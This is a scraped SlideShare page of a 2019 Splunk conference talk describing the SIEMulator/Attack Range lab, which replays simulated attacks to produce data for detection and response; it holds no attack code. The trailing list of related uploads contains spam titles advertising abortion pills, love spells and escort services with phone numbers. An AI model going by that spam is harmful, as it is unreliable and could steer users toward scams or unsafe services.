SlideShare uma empresa Scribd logo

SEC1671/ Attack range/Splunk SIEMulator splunkconf2019

R
Rod Soto

SPEAKERS Phil Royer, Research Engineer, Splunk Rod Soto, Principal Security Research Engineer, Splunk Obtaining data to develop defenses against threats is a constant challenge for security analysts. To that end, Splunk's Security Research team developed the Splunk SIEMulator, a framework modeled after Chris Long's DetectionLab that allows a...

Software
1 de 26
Baixar para ler offline
© 2019 SPLUNK INC. © 2019 SPLUNK INC. Rod Soto + Phil Royer Use Splunk SIEMulator to Generate Data for Automated, Detection, Investigation, and Response Splunk Security Research
During the course of this presentation, we may make forward‐looking statements regarding future events or plans of the company. We caution you that such statements reflect our current expectations and estimates based on factors currently known to us and that actual events or results may differ materially. The forward-looking statements made in the this presentation are being made as of the time and date of its live presentation. If reviewed after its live presentation, it may not contain current or accurate information. We do not assume any obligation to update any forward‐looking statements made herein. In addition, any information about our roadmap outlines our general product direction and is subject to change at any time without notice. It is for informational purposes only, and shall not be incorporated into any contract or other commitment. Splunk undertakes no obligation either to develop the features or functionalities described or to include any such feature or functionality in a future release. Splunk, Splunk>, Turn Data Into Doing, The Engine for Machine Data, Splunk Cloud, Splunk Light and SPL are trademarks and registered trademarks of Splunk Inc. in the United States and other countries. All other brand names, product names, or trademarks belong to their respective owners. © 2019 Splunk Inc. All rights reserved. Forward- Looking Statements © 2019 SPLUNK INC.
© 2019 SPLUNK INC. Research Engineer Phil Royer Principal Security Researcher Rod Soto
© 2019 SPLUNK INC. The Problem with a Lack of Data • Always catching up to the latest crimeware/exploit code • Exploit/Bug market has made it more difficult • Lack of a common data sharing framework • Data if any is divided in pieces (exploitation, detection, pcaps/logs,) • Most enterprises cannot afford a dedicated team of specialists to replicate/recreate specialized data
© 2019 SPLUNK INC. Industry Limitations • No standard framework for sharing data • Market driven by keeping data proprietary or charging for it • Data shared into several pieces puzzle/jeopardy style • Replicating exploits is still seen as breaking the rules or out of many corporate defensive environments • There is no single framework that puts all the pieces together...
© 2019 SPLUNK INC. Challenges in Data Replication ​Where does data come from? • 0days, Twitter, Disclosure lists, Exploit-Db, Industry reports, Security Groups, Internal Research, Github ​How do we replicate/measure? • Exploit-Db, Github, Adversarial Simulation (Caldera, FireDrill, RedCanary, Metasploit) ​How do we countermeasure? • Snort Signature, Splunk Searches (Investigation/Detection), Phantom Playbooks
© 2019 SPLUNK INC. Enter Splunk SIEMulator • Project based on Chris Long’s Detection Lab (https://github.com/clong/DetectionLab) • Used to feed data into Splunk • Seeks to replicate attacks, generate data and countermeasures in a single framework • Infrastructure as Code allows continuous integration, quick deployment, cloud storage and elasticity
© 2019 SPLUNK INC. SIEMulator IaC
© 2019 SPLUNK INC. Attack Replication
© 2019 SPLUNK INC. SIEMulator Architecture Overview Domain Controller Windows 10 AttackIQ FireDrill Simulated Attacks Splunk ES Phanto m Red Team Telemetry Forwarder Logs and Events Notable Events Investigation and Response Windows Target Infrastructure
© 2019 SPLUNK INC. ​Example
© 2019 SPLUNK INC. Attack Range Setup
© 2019 SPLUNK INC. AttackIQ Web Interface (T1218/T1047)
© 2019 SPLUNK INC. AttackIQ Web Interface (T1218/T1047)
© 2019 SPLUNK INC. Attack Recorded in Splunk (T1218/T1047)
© 2019 SPLUNK INC. Translating Data into the Defensive Context Splunk ES Detection Search T1218/T1047
© 2019 SPLUNK INC. Applying This Data Splunk Alert
© 2019 SPLUNK INC. Applying This Data - Investigation Searches
© 2019 SPLUNK INC. Applying This Data - Investigation Searches
© 2019 SPLUNK INC.
© 2019 SPLUNK INC. Applying This Process • By applying this process we can cover the entire cycle of replicating known and new exploits, recording data applying Splunk technology for detection, investigation and defense. • We can now streamline the process of producing new content and tackle new threats in a faster mode. • We can now share this knowledge via content updates, publishing searches, playbooks, apps or modifying current content. • Future work will include integration with other Adversarial Simulation frameworks
© 2019 SPLUNK INC. Content Production via ESCU
© 2019 SPLUNK INC. The Security Research Team is devoted to delivering actionable intelligence to Splunk’s customers in an unceasing effort to safeguard them against modern enterprise risks. Composed of elite researchers, engineers, and consultants who have served in both public and private sector organizations, this innovative team of digital defenders monitors emerging cybercrime trends and techniques, then translates them into practical analytics that Splunk users can operationalize within their environments. Download Splunk Enterprise Security Content Update in Splunkbase to learn more. Splunk Security Research Team
© 2019 SPLUNK INC. https://github.com/splunk/attack_range This is an underscore
RATE THIS SESSION Go to the .conf19 mobile app to © 2019 SPLUNK INC. You ! Thank
© 2019 SPLUNK INC. Q&A Rod Soto | Security Researcher Philip Royer | Security Researcher

Recomendados

Predictive, Proactive, and Collaborative ML with iT Service Intelligence
Predictive, Proactive, and Collaborative ML with iT Service Intelligence Predictive, Proactive, and Collaborative ML with iT Service Intelligence
Predictive, Proactive, and Collaborative ML with iT Service Intelligence
Splunk
 
Exploring Frameworks of Splunk Enterprise Security
Exploring Frameworks of Splunk Enterprise Security Exploring Frameworks of Splunk Enterprise Security
Exploring Frameworks of Splunk Enterprise Security
Splunk
 
SplunkLive! Paris 2018: Integrating Metrics and Logs
SplunkLive! Paris 2018: Integrating Metrics and LogsSplunkLive! Paris 2018: Integrating Metrics and Logs
SplunkLive! Paris 2018: Integrating Metrics and Logs
Splunk
 
Accelerate Incident Response with Orchestration & Automation
Accelerate Incident Response with Orchestration & AutomationAccelerate Incident Response with Orchestration & Automation
Accelerate Incident Response with Orchestration & Automation
Splunk
 
Get more from your Machine Data with Splunk AI and ML
Get more from your Machine Data with Splunk AI and ML Get more from your Machine Data with Splunk AI and ML
Get more from your Machine Data with Splunk AI and ML
Splunk
 
Machine Learning in Action
Machine Learning in Action Machine Learning in Action
Machine Learning in Action
Splunk
 
Vorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSI
Vorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSIVorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSI
Vorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSI
Splunk
 
Splunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVO
Splunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVOSplunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVO
Splunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVO
Splunk
 

Recomendados

Predictive, Proactive, and Collaborative ML with iT Service Intelligence
Predictive, Proactive, and Collaborative ML with iT Service Intelligence Predictive, Proactive, and Collaborative ML with iT Service Intelligence
Predictive, Proactive, and Collaborative ML with iT Service Intelligence
Splunk
 
Exploring Frameworks of Splunk Enterprise Security
Exploring Frameworks of Splunk Enterprise Security Exploring Frameworks of Splunk Enterprise Security
Exploring Frameworks of Splunk Enterprise Security
Splunk
 
SplunkLive! Paris 2018: Integrating Metrics and Logs
SplunkLive! Paris 2018: Integrating Metrics and LogsSplunkLive! Paris 2018: Integrating Metrics and Logs
SplunkLive! Paris 2018: Integrating Metrics and Logs
Splunk
 
Accelerate Incident Response with Orchestration & Automation
Accelerate Incident Response with Orchestration & AutomationAccelerate Incident Response with Orchestration & Automation
Accelerate Incident Response with Orchestration & Automation
Splunk
 
Get more from your Machine Data with Splunk AI and ML
Get more from your Machine Data with Splunk AI and ML Get more from your Machine Data with Splunk AI and ML
Get more from your Machine Data with Splunk AI and ML
Splunk
 
Machine Learning in Action
Machine Learning in Action Machine Learning in Action
Machine Learning in Action
Splunk
 
Vorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSI
Vorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSIVorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSI
Vorausschauendes, proaktives und collaboratives Machine Learning mit Splunk ITSI
Splunk
 
Splunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVO
Splunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVOSplunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVO
Splunk Forum Frankfurt - 15th Nov 2017 - GDPR / EU-DSGVO
Splunk
 
Introduction into Security Analytics Methods
Introduction into Security Analytics Methods Introduction into Security Analytics Methods
Introduction into Security Analytics Methods
Splunk
 
Splunk and Multicloud
Splunk and Multicloud Splunk and Multicloud
Splunk and Multicloud
Splunk
 
SplunkLive! Paris 2018: Plenary Session
SplunkLive! Paris 2018: Plenary SessionSplunkLive! Paris 2018: Plenary Session
SplunkLive! Paris 2018: Plenary Session
Splunk
 
SplunkLive! Stockholm 2019 - Customer presentation: Norlys
SplunkLive! Stockholm 2019 - Customer presentation: Norlys SplunkLive! Stockholm 2019 - Customer presentation: Norlys
SplunkLive! Stockholm 2019 - Customer presentation: Norlys
Splunk
 
SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...
SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...
SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...
Splunk
 
Partner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOAR
Partner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOARPartner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOAR
Partner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOAR
Splunk
 
SplunkLive! Paris 2018: Intro to Security Analytics Methods
SplunkLive! Paris 2018: Intro to Security Analytics MethodsSplunkLive! Paris 2018: Intro to Security Analytics Methods
SplunkLive! Paris 2018: Intro to Security Analytics Methods
Splunk
 
Machine Learning in Action
Machine Learning in ActionMachine Learning in Action
Machine Learning in Action
Splunk
 
A Day in the Life of a GDPR Breach - September 2017: France
A Day in the Life of a GDPR Breach - September 2017: France A Day in the Life of a GDPR Breach - September 2017: France
A Day in the Life of a GDPR Breach - September 2017: France
Splunk
 
A Day in the Life of a GDPR Breach - September 2017: Germany
A Day in the Life of a GDPR Breach - September 2017: Germany A Day in the Life of a GDPR Breach - September 2017: Germany
A Day in the Life of a GDPR Breach - September 2017: Germany
Splunk
 
Splunk Discovery Day Milwaukee 9-14-17
Splunk Discovery Day Milwaukee 9-14-17Splunk Discovery Day Milwaukee 9-14-17
Splunk Discovery Day Milwaukee 9-14-17
Splunk
 
Accelerate incident Response Using Orchestration and Automation
Accelerate incident Response Using Orchestration and Automation Accelerate incident Response Using Orchestration and Automation
Accelerate incident Response Using Orchestration and Automation
Splunk
 
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with SplunkSplunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk
 
Netskope Overview
Netskope OverviewNetskope Overview
Netskope Overview
Netskope
 
Analytics im DevOps Lebenszyklus
Analytics im DevOps LebenszyklusAnalytics im DevOps Lebenszyklus
Analytics im DevOps Lebenszyklus
Splunk
 
The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018
The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018
The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018
Splunk
 
Using Deception to Detect and Profile Hidden Threats
Using Deception to Detect and Profile Hidden ThreatsUsing Deception to Detect and Profile Hidden Threats
Using Deception to Detect and Profile Hidden Threats
Satnam Singh
 
Splunk Phantom SOAR Roundtable
Splunk Phantom SOAR RoundtableSplunk Phantom SOAR Roundtable
Splunk Phantom SOAR Roundtable
Splunk
 
How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...
How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...
How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...
Splunk
 
Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2
Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2
Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2
Splunk
 
Spliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics Methods
Spliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics MethodsSpliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics Methods
Spliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics Methods
Splunk
 
Splunk Discovery Köln - 17-01-2020 - Accelerate Incident Response
Splunk Discovery Köln - 17-01-2020 - Accelerate Incident ResponseSplunk Discovery Köln - 17-01-2020 - Accelerate Incident Response
Splunk Discovery Köln - 17-01-2020 - Accelerate Incident Response
Splunk
 

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Introduction into Security Analytics Methods
Introduction into Security Analytics Methods Introduction into Security Analytics Methods
Introduction into Security Analytics Methods
 
Splunk and Multicloud
Splunk and Multicloud Splunk and Multicloud
Splunk and Multicloud
 
SplunkLive! Paris 2018: Plenary Session
SplunkLive! Paris 2018: Plenary SessionSplunkLive! Paris 2018: Plenary Session
SplunkLive! Paris 2018: Plenary Session
 
SplunkLive! Stockholm 2019 - Customer presentation: Norlys
SplunkLive! Stockholm 2019 - Customer presentation: Norlys SplunkLive! Stockholm 2019 - Customer presentation: Norlys
SplunkLive! Stockholm 2019 - Customer presentation: Norlys
 
SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...
SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...
SplunkLive! Paris 2018: Use Splunk for Incident Response, Orchestration and A...
 
Partner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOAR
Partner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOARPartner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOAR
Partner Exec Summit 2018 - Frankfurt: Analytics-driven Security und SOAR
 
SplunkLive! Paris 2018: Intro to Security Analytics Methods
SplunkLive! Paris 2018: Intro to Security Analytics MethodsSplunkLive! Paris 2018: Intro to Security Analytics Methods
SplunkLive! Paris 2018: Intro to Security Analytics Methods
 
Machine Learning in Action
Machine Learning in ActionMachine Learning in Action
Machine Learning in Action
 
A Day in the Life of a GDPR Breach - September 2017: France
A Day in the Life of a GDPR Breach - September 2017: France A Day in the Life of a GDPR Breach - September 2017: France
A Day in the Life of a GDPR Breach - September 2017: France
 
A Day in the Life of a GDPR Breach - September 2017: Germany
A Day in the Life of a GDPR Breach - September 2017: Germany A Day in the Life of a GDPR Breach - September 2017: Germany
A Day in the Life of a GDPR Breach - September 2017: Germany
 
Splunk Discovery Day Milwaukee 9-14-17
Splunk Discovery Day Milwaukee 9-14-17Splunk Discovery Day Milwaukee 9-14-17
Splunk Discovery Day Milwaukee 9-14-17
 
Accelerate incident Response Using Orchestration and Automation
Accelerate incident Response Using Orchestration and Automation Accelerate incident Response Using Orchestration and Automation
Accelerate incident Response Using Orchestration and Automation
 
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with SplunkSplunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
Splunk Forum Frankfurt - 15th Nov 2017 - Building SOC with Splunk
 
Netskope Overview
Netskope OverviewNetskope Overview
Netskope Overview
 
Analytics im DevOps Lebenszyklus
Analytics im DevOps LebenszyklusAnalytics im DevOps Lebenszyklus
Analytics im DevOps Lebenszyklus
 
The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018
The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018
The Splunk AISecOps Initiative - Splunk Security Roundtable: Zurich 2018
 
Using Deception to Detect and Profile Hidden Threats
Using Deception to Detect and Profile Hidden ThreatsUsing Deception to Detect and Profile Hidden Threats
Using Deception to Detect and Profile Hidden Threats
 
Splunk Phantom SOAR Roundtable
Splunk Phantom SOAR RoundtableSplunk Phantom SOAR Roundtable
Splunk Phantom SOAR Roundtable
 
How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...
How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...
How to Move from Monitoring to Observability, On-Premises and in a Multi-Clou...
 
Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2
Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2
Splunk GDPR Security Roundtable: Zurich - 22 Nov 2017 PT2
 

Semelhante a SEC1671/ Attack range/Splunk SIEMulator splunkconf2019

Mission possible splunk+paloaltonetworks_6_2015
Mission possible splunk+paloaltonetworks_6_2015Mission possible splunk+paloaltonetworks_6_2015
Mission possible splunk+paloaltonetworks_6_2015
Splunk
 
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Erin Sweeney
 
DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...
DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...
DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...
Dataconomy Media
 
Make Your SOC Work Smarter, Not Harder
Make Your SOC Work Smarter, Not HarderMake Your SOC Work Smarter, Not Harder
Make Your SOC Work Smarter, Not Harder
Splunk
 

Semelhante a SEC1671/ Attack range/Splunk SIEMulator splunkconf2019 (20)

Spliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics Methods
Spliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics MethodsSpliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics Methods
Spliunk Discovery Köln - 17-01-2020 - Intro to Security Analytics Methods
 
Splunk Discovery Köln - 17-01-2020 - Accelerate Incident Response
Splunk Discovery Köln - 17-01-2020 - Accelerate Incident ResponseSplunk Discovery Köln - 17-01-2020 - Accelerate Incident Response
Splunk Discovery Köln - 17-01-2020 - Accelerate Incident Response
 
Splunk-Presentation
Splunk-Presentation Splunk-Presentation
Splunk-Presentation
 
Turning Data Into Business Outcomes with the Splunk Platform
Turning Data Into Business Outcomes with the Splunk PlatformTurning Data Into Business Outcomes with the Splunk Platform
Turning Data Into Business Outcomes with the Splunk Platform
 
Exploring Frameworks of Splunk Enterprise Security
Exploring Frameworks of Splunk Enterprise SecurityExploring Frameworks of Splunk Enterprise Security
Exploring Frameworks of Splunk Enterprise Security
 
Splunk Enterprise Security
Splunk Enterprise SecuritySplunk Enterprise Security
Splunk Enterprise Security
 
SplunkLive! Paris 2018: Delivering New Visibility And Analytics For IT Operat...
SplunkLive! Paris 2018: Delivering New Visibility And Analytics For IT Operat...SplunkLive! Paris 2018: Delivering New Visibility And Analytics For IT Operat...
SplunkLive! Paris 2018: Delivering New Visibility And Analytics For IT Operat...
 
December Bengaluru Splunk User Group Meetup
December Bengaluru Splunk User Group MeetupDecember Bengaluru Splunk User Group Meetup
December Bengaluru Splunk User Group Meetup
 
Machine Learning in Action
Machine Learning in ActionMachine Learning in Action
Machine Learning in Action
 
Machine Learning in Action
Machine Learning in Action Machine Learning in Action
Machine Learning in Action
 
Introduction into Security Analytics Methods
Introduction into Security Analytics Methods Introduction into Security Analytics Methods
Introduction into Security Analytics Methods
 
Mission possible splunk+paloaltonetworks_6_2015
Mission possible splunk+paloaltonetworks_6_2015Mission possible splunk+paloaltonetworks_6_2015
Mission possible splunk+paloaltonetworks_6_2015
 
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
Mission Possible: Detect and Prevent CyberAttacks with Splunk and Palo Alto N...
 
Accelerate incident Response Using Orchestration and Automation
Accelerate incident Response Using Orchestration and Automation Accelerate incident Response Using Orchestration and Automation
Accelerate incident Response Using Orchestration and Automation
 
Splunk Artificial Intelligence & Machine Learning Webinar
Splunk Artificial Intelligence & Machine Learning WebinarSplunk Artificial Intelligence & Machine Learning Webinar
Splunk Artificial Intelligence & Machine Learning Webinar
 
DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...
DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...
DN18 | Applied Machine Learning in Cybersecurity: Detect malicious DGA Domain...
 
Make Your SOC Work Smarter, Not Harder
Make Your SOC Work Smarter, Not HarderMake Your SOC Work Smarter, Not Harder
Make Your SOC Work Smarter, Not Harder
 
Einführung in Security Analytics Methoden
Einführung in Security Analytics MethodenEinführung in Security Analytics Methoden
Einführung in Security Analytics Methoden
 
Get more from your Machine Date with Splunk AI and ML
Get more from your Machine Date with Splunk AI and ML Get more from your Machine Date with Splunk AI and ML
Get more from your Machine Date with Splunk AI and ML
 
Splunk Discovery Köln - 17-01-2020 - Willkommen!
Splunk Discovery Köln - 17-01-2020 - Willkommen!Splunk Discovery Köln - 17-01-2020 - Willkommen!
Splunk Discovery Köln - 17-01-2020 - Willkommen!
 

Mais de Rod Soto

SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
Rod Soto
 
BsidesLVPresso2016_JZeditsv6
BsidesLVPresso2016_JZeditsv6BsidesLVPresso2016_JZeditsv6
BsidesLVPresso2016_JZeditsv6
Rod Soto
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
Rod Soto
 
CryptoRansomDefenseCounterMeasureGuide
CryptoRansomDefenseCounterMeasureGuideCryptoRansomDefenseCounterMeasureGuide
CryptoRansomDefenseCounterMeasureGuide
Rod Soto
 

Mais de Rod Soto (8)

Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
The Lambda Defense Functional Paradigms for Cyber Security
The Lambda Defense Functional Paradigms for Cyber SecurityThe Lambda Defense Functional Paradigms for Cyber Security
The Lambda Defense Functional Paradigms for Cyber Security
 
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
Dynamic Population Discovery for Lateral Movement (Using Machine Learning)
 
BsidesLVPresso2016_JZeditsv6
BsidesLVPresso2016_JZeditsv6BsidesLVPresso2016_JZeditsv6
BsidesLVPresso2016_JZeditsv6
 
AktaionvWhitePaperBlackHat2016
AktaionvWhitePaperBlackHat2016AktaionvWhitePaperBlackHat2016
AktaionvWhitePaperBlackHat2016
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
 
CryptoRansomDefenseCounterMeasureGuide
CryptoRansomDefenseCounterMeasureGuideCryptoRansomDefenseCounterMeasureGuide
CryptoRansomDefenseCounterMeasureGuide
 

Último

AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
Presentation.STUDIO
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
masabamasaba
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
masabamasaba
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
shinachiaurasa2
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile EnvironmentHarnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
VictorSzoltysek
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 

Último (20)

AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
%+27788225528 love spells in Colorado Springs Psychic Readings, Attraction sp...
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
WSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go PlatformlessWSO2CON2024 - It's time to go Platformless
WSO2CON2024 - It's time to go Platformless
 
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
%+27788225528 love spells in new york Psychic Readings, Attraction spells,Bri...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
The title is not connected to what is inside
The title is not connected to what is insideThe title is not connected to what is inside
The title is not connected to what is inside
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile EnvironmentHarnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
